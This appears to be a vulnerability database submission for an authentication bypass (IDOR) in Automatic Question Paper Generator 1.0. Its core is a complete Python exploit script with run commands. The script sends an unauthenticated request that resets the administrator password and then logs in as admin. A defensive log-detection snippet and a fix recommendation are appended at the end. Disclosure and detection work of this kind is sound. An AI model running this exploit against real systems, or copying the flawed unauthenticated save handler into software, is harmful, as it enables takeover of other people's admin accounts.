| Title | Automatic Question Paper Generator System 1.0 - Authentication Bypass |
|---|
| Description | The Automatic Question Paper Generator (AQPG) version 1.0 is vulnerable to an authentication bypass: an insecure direct object reference (IDOR) allows the administrator password to be changed, so an attacker can gain full access to the administrator account by resetting its password.
* Steps to Reproduce:
1. Create a Python file, paste the following code into it and save it as exploit.py:
#######################################################
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse


def banner():
    # Raw string so the backslashes in the ASCII art are not treated as escapes
    print(r'''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/
[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')


def main():
    # Form fields sent to the user save handler; 'id' selects the account to update
    fields = {
        'id': "1",
        'firstname': 'Adminstrator',
        'lastname': 'Admin',
        'username': 'admin',
        'password': arguments.newpassword
    }
    boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
    m = MultipartEncoder(fields=fields, boundary=boundary)
    headers = {
        "Connection": "keep-alive",
        "Content-Type": m.content_type
    }
    # The request carries no session cookie or other credentials
    r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)
    if '1' in r.text:
        print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')
    else:
        print('[-] Not vulnerable')


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True)
    parser.add_argument('-p', '--password', action='store', help='New password', dest='newpassword', required=True)
    arguments = parser.parse_args()
    banner()
    sleep(2)
    main()
#######################################################
2. Run the command:
python3 exploit.py -u http://target.com/aqpg/ -p newpassword
3. Now open your browser, go to the admin login page (http://target.com/aqpg/admin/login.php) and log in using the admin:newpassword credentials.
You will be logged into the administrator account. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 03/05/2022 18:13 (4 years ago) |
|---|
| Moderation | 03/13/2022 12:12 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 194839 [Automatic Question Paper Generator 1.0 password recovery] |
|---|
| Points | 20 |
|---|
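
One way to look for this request pattern in web server access logs, as an added example that is not part of the original submission: it flags POSTs to `classes/Users.php?f=save` from client addresses that did not request the login page earlier in the log. The combined log format, the sample lines, the function name and the use of the login page as a stand-in for "has a session" are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = '''\
198.51.100.7 - - [05/Mar/2022:18:01:10 +0000] "GET /aqpg/admin/login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Mar/2022:18:01:31 +0000] "POST /aqpg/classes/Users.php?f=save HTTP/1.1" 200 1 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Mar/2022:18:13:02 +0000] "POST /aqpg/classes/Users.php?f=save HTTP/1.1" 200 1 "-" "python-requests/2.27.1"
203.0.113.9 - - [05/Mar/2022:18:13:40 +0000] "GET /aqpg/admin/login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Mar/2022:18:20:00 +0000] "GET /aqpg/classes/Users.php?f=save HTTP/1.1" 200 0 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def find_unauthenticated_saves(log_text, login_suffix="/admin/login.php"):
    """Return save requests from clients with no earlier login-page request.

    Assumes the lines are in chronological order. Heuristic only: the server
    log cannot prove a session existed, so hits are leads for review.
    """
    seen_login = set()   # client addresses that have requested the login page
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue     # skip lines that are not in combined log format
        url = urlsplit(m["target"])
        if url.path.endswith(login_suffix):
            seen_login.add(m["ip"])
            continue
        is_save = (
            m["method"] == "POST"
            and url.path.endswith("/classes/Users.php")
            and parse_qs(url.query).get("f") == ["save"]
        )
        if is_save and m["ip"] not in seen_login:
            alerts.append({"ip": m["ip"], "time": m["ts"],
                           "status": int(m["status"]), "user_agent": m["ua"]})
    return alerts


if __name__ == "__main__":
    for alert in find_unauthenticated_saves(SAMPLE_LOG):
        print(alert)
```

A hit here only narrows the review; the underlying fix is for the save handler to require an authenticated session and to check that the session's user is allowed to modify the submitted `id`.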